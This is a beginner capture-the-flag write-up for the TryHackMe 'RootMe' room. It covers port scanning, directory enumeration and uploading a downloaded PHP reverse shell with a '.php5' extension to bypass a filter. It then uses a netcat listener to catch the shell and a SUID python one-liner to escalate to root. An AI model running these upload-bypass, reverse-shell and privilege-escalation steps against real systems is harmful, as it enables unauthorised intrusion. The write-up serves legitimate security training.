> For the complete documentation index, see [llms.txt](https://blog.verni.lol/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.verni.lol/try-hack-me-write-ups/rootme.md).

# RootME

## [RootMe](https://www.tryhackme.com/room/rrootme)

##

A ctf for beginners, can you root me?

### Questions

* Scan the machine, how many ports are open?
* What version of Apache are running?
* What is the hidden directory?
* user.txt?
* Search for files with SUID permission, which file is weird?
* root.txt?

## Enumeration

### Nmap

> nmap -sSVC -A -O -vv

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
```

#### Q: Scan the machine, how many ports are open?

> A: 2

#### Q: What version of Apache are running?

> A: 2.4.29

#### Q: What service is running on port 22?

> A: ssh

### finding Directories/files

> gobuster dir -u [http://10.10.63.255:80/](http://10.10.63.255/) -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the ip is different because I continued that writeup the other day)

![](https://user-images.githubusercontent.com/53917092/95799616-9c977c80-0ccb-11eb-8c12-1261b632a434.png)

#### Q: What is the hidden directory?

> A: /panel/

checking the directory /panel/, we have

[![image](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)

let's try to upload a shell

shell: <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o revs.php

remember to set a port to listening

> nc -lvp PORT

[![image](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)

"PHP isn't permitted"

let's try bypassing this using the ".php5" extension

> mv revs.php revs.php5

[![image](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)

it worked

to run click on "veja" ("see")

![](https://user-images.githubusercontent.com/53917092/95801051-81c70700-0ccf-11eb-9179-d92c4d421c56.png)

it worked, we have shell

to get a tty

> python -c 'import pty;pty.spawn("/bin/bash")'

> Ctrl+Z

> stty raw -echo

> fg

> export TERM=xterm

![image](https://user-images.githubusercontent.com/53917092/95801836-087ce380-0cd2-11eb-9d6a-dfcb6863ae6c.png)

### user.txt

#### finding

> find / -type f -name user.txt 2>/dev/null

[![image](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)

#### getting

> cat /var/www/user.txt

[![image](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)

### root.txt / Privilege Escalation

To look for the files with SUID permission we can use the command:

> find / -type f -user root -perm -4000 2>/dev/null

![](https://user-images.githubusercontent.com/53917092/95803488-9ce94500-0cd6-11eb-9d5c-e8822a26ddb7.png)

#### Exploring python set uid capabilities

> python -c "import os;os.setuid(0);os.system('/bin/bash')"

![](https://user-images.githubusercontent.com/53917092/95803893-a7f0a500-0cd7-11eb-9a16-463b7cbc950a.png)

#### getting

![](https://user-images.githubusercontent.com/53917092/97299626-fbb0d180-1833-11eb-8160-946f299c1725.png)
